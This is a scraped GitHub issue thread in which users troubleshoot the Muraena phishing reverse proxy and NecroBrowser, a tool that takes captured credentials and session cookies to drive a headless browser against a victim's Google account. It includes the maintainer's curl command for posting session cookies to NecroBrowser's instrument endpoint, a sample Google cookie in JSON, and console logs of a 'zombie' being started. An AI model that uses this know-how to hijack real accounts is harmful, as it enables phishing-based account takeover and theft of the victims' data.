Comments (15)

ohpe commented on August 30, 2024

Well, it's tricky to debug this issue in the way you reported.

  • Did muraena collect the credentials?
  • Is necrobrowser running?

If you are listening on localhost you shouldn't need any firewall rule.

from muraena.

infosecwatchman commented on August 30, 2024

It collected the username and password, not sure about the cookie. Necrobrowser is running, it is on localhost. Is there a command I have to run to tell muraena to pass the creds?

ohpe commented on August 30, 2024

Can you share the config?

infosecwatchman commented on August 30, 2024

Here's my config.
muraena-google-config.txt

infosecwatchman commented on August 30, 2024

@ohpe Do I have to change the necrobrowser token to something I create?

ohpe commented on August 30, 2024

The necrobrowser must be the same. Try to send a request manually to necrobrowser and check the console to see if it works. The issue is a bit too generic and I can't assist. Please reopen if you find the real cause.

infosecwatchman commented on August 30, 2024

@ohpe What kind of request do I need to send and how?

ohpe commented on August 30, 2024

https://github.com/muraenateam/necrobrowser#zombies

curl -X POST \
  http://<NECRO>/instrument/<TOKEN> \
  -H 'Content-Type: application/json' \
  -d '{
    "provider": "gsuite",
    "keywords": [],
    "debugPort": 9229,
    "sessionCookies": [ <COOKIES> ]
}'

infosecwatchman commented on August 30, 2024

I got this.

$ curl -X POST \
>   http://127.0.0.1:8080/instrument/ada9 \
>   -H 'Content-Type: application/json' \
>   -d '{
>     "provider": "gsuite",
>     "keywords": [],
>     "debugPort": 9229,
>     "sessionCookies": [ <COOKIES> ]
> }'
{"error":"invalid character '\u003c' looking for beginning of value","success":false}

The Necrobrowser console output from it:

$ sudo ./necrobrowser --debug --headless true --token "ada9"
2019-06-03 12:23:48 dbg Pulling image registry.hub.docker.com/zenika/alpine-chrome:latest
2019-06-03 12:23:48 dbg {"status":"Pulling from zenika/alpine-chrome","id":"latest"}
{"status":"Digest: sha256:32518577d989d192cb3420229c2d0b76eec4076cbde7f85b7709d79cb04076de"}
{"status":"Status: Image is up to date for registry.hub.docker.com/zenika/alpine-chrome:latest"}

[GIN-debug] [WARNING] Creating an Engine instance with the Logger and Recovery middleware already attached.

[GIN-debug] [WARNING] Running in "debug" mode. Switch to "release" mode in production.
 - using env:	export GIN_MODE=release
 - using code:	gin.SetMode(gin.ReleaseMode)

[GIN-debug] POST   /instrument/:token        --> github.com/muraenateam/necrobrowser/server.NewBrowserHandler (8 handlers)
[GIN-debug] POST   /instrumentKnown/:token   --> github.com/muraenateam/necrobrowser/server.KnownBrowserHandler (8 handlers)
[GIN-debug] GET    /status/:token            --> github.com/muraenateam/necrobrowser/server.StatusHandler (8 handlers)
2019-06-03 12:23:48 inf NecroBrowser - by antisnatchor & ohpe
Wwaiting for commands on 0.0.0.0:8080 \m/
Auth Token: ada9
[GIN-debug] Listening and serving HTTP on 0.0.0.0:8080
[GIN] 2019/06/03 - 12:43:05 | 400 |    2.164836ms |       127.0.0.1 | POST     /instrument/ada9
[GIN] 2019/06/03 - 12:43:05 | 400 |    2.494743ms |       127.0.0.1 | POST     /instrument/ada9
[GIN] 2019/06/03 - 12:43:25 | 400 |     915.609µs |       127.0.0.1 | POST     /instrument/ada9
[GIN] 2019/06/03 - 12:43:25 | 400 |    1.089366ms |       127.0.0.1 | POST     /instrument/ada9

ohpe commented on August 30, 2024

The error message is pretty clear. {"error":"invalid character '\u003c' looking for beginning of value","success":false}

infosecwatchman commented on August 30, 2024

Please forgive me, I am unaware of this error, what does this mean?

ohpe commented on August 30, 2024

<COOKIES> is not a valid cookie value.

infosecwatchman commented on August 30, 2024

What format should the cookie be in? Like this?

{
    "domain": ".google.com",
    "expirationDate": 1622981604.474241,
    "hostOnly": false,
    "httpOnly": false,
    "name": "APISID",
    "path": "/",
    "sameSite": "no_restriction",
    "secure": false,
    "session": false,
    "storeId": "0",
    "value": "q_tyy5AEZKCeFhdN/Ae6bbYW6ncARJQ2zY",
    "id": 3
}

infosecwatchman commented on August 30, 2024

@ohpe Okay, I think I made some progress, but am confused as to why the container is requesting access to port 9229 on my local machine.

$ sudo ./necrobrowser --debug --headless true --token "ada9f7b8-6e6*"
[sudo] password for user: 
2019-06-20 17:04:31 dbg Pulling image registry.hub.docker.com/zenika/alpine-chrome:latest
2019-06-20 17:04:31 dbg {"status":"Pulling from zenika/alpine-chrome","id":"latest"}
{"status":"Digest: sha256:f9a5563f407535c1f620e9b3c53538a54582b4095de856872f8f6f2156f2ac29"}
{"status":"Status: Image is up to date for registry.hub.docker.com/zenika/alpine-chrome:latest"}

[GIN-debug] [WARNING] Creating an Engine instance with the Logger and Recovery middleware already attached.

[GIN-debug] [WARNING] Running in "debug" mode. Switch to "release" mode in production.
 - using env:	export GIN_MODE=release
 - using code:	gin.SetMode(gin.ReleaseMode)

[GIN-debug] POST   /instrument/:token        --> github.com/muraenateam/necrobrowser/server.NewBrowserHandler (8 handlers)
[GIN-debug] POST   /instrumentKnown/:token   --> github.com/muraenateam/necrobrowser/server.KnownBrowserHandler (8 handlers)
[GIN-debug] GET    /status/:token            --> github.com/muraenateam/necrobrowser/server.StatusHandler (8 handlers)
2019-06-20 17:04:31 inf NecroBrowser - by antisnatchor & ohpe
Wwaiting for commands on 0.0.0.0:8080 \m/
Auth Token: ada9f7b8-6e6c-4884-b2a3-ea757c1eb617
[GIN-debug] Listening and serving HTTP on 0.0.0.0:8080
[GIN] 2019/06/20 - 17:07:07 | 400 |    5.927006ms |       127.0.0.1 | POST     /instrument/ada9f7b8-6e6c-4884-b2a3-ea757c1eb617
[GIN] 2019/06/20 - 17:07:07 | 400 |    6.178855ms |       127.0.0.1 | POST     /instrument/ada9f7b8-6e6c-4884-b2a3-ea757c1eb617
2019-06-20 18:46:11 inf Instructing zombie for gsuite
2019-06-20 18:46:11 dbg Loot path doesn't exist, creating
2019-06-20 18:46:11 inf Going HEADLESS mode
2019-06-20 18:46:11 inf Creating a new container gsuite_ywWSQcwdbW
2019-06-20 18:46:11 dbg instructing the docker daemon to start (gsuite_ywWSQcwdbW)[144420185e18d1d9ca4b048145c8d3ee40fe49661fb7d2342ee7cb241b4e5f35]
2019-06-20 18:46:12 dbg Container ready
2019-06-20 18:46:12 dbg 
2019-06-20 18:46:12 imp Retrieving debugger URL from http://127.0.0.1:9229/json
2019-06-20 18:46:12 err Get http://127.0.0.1:9229/json: read tcp 127.0.0.1:46948->127.0.0.1:9229: read: connection reset by peer
2019-06-20 18:46:14 err Get http://127.0.0.1:9229/json: dial tcp 127.0.0.1:9229: connect: connection refused
2019-06-20 18:46:16 err Get http://127.0.0.1:9229/json: dial tcp 127.0.0.1:9229: connect: connection refused
2019-06-20 18:46:18 err Get http://127.0.0.1:9229/json: dial tcp 127.0.0.1:9229: connect: connection refused
2019-06-20 18:46:20 err Get http://127.0.0.1:9229/json: dial tcp 127.0.0.1:9229: connect: connection refused
2019-06-20 18:46:22 err Get http://127.0.0.1:9229/json: dial tcp 127.0.0.1:9229: connect: connection refused
2019-06-20 18:46:24 err Get http://127.0.0.1:9229/json: dial tcp 127.0.0.1:9229: connect: connection refused
2019-06-20 18:46:26 err Get http://127.0.0.1:9229/json: dial tcp 127.0.0.1:9229: connect: connection refused
2019-06-20 18:46:28 err Get http://127.0.0.1:9229/json: dial tcp 127.0.0.1:9229: connect: connection refused
2019-06-20 18:46:30 err Get http://127.0.0.1:9229/json: dial tcp 127.0.0.1:9229: connect: connection refused
2019-06-20 18:46:32 err Get http://127.0.0.1:9229/json: dial tcp 127.0.0.1:9229: connect: connection refused
2019-06-20 18:46:32 err Get http://127.0.0.1:9229/json: dial tcp 127.0.0.1:9229: connect: connection refused
[GIN] 2019/06/20 - 18:46:32 | 417 | 20.909394655s |       127.0.0.1 | POST     /instrument/ada9f7b8-6e6c-4884-
[GIN] 2019/06/20 - 18:46:32 | 417 | 20.909422565s |       127.0.0.1 | POST     /instrument/ada9f7b8-6e6c-48

imdj598 commented on August 30, 2024

<COOKIES> is not a valid cookie value.

Hi,
I have the same problem.
When I start necrobrowser, these messages appear:

Wwaiting for commands on 0.0.0.0:8080 \m/
Auth Token: ada9f........

and it doesn't continue!!
Where is the problem, and how do I set the cookie?
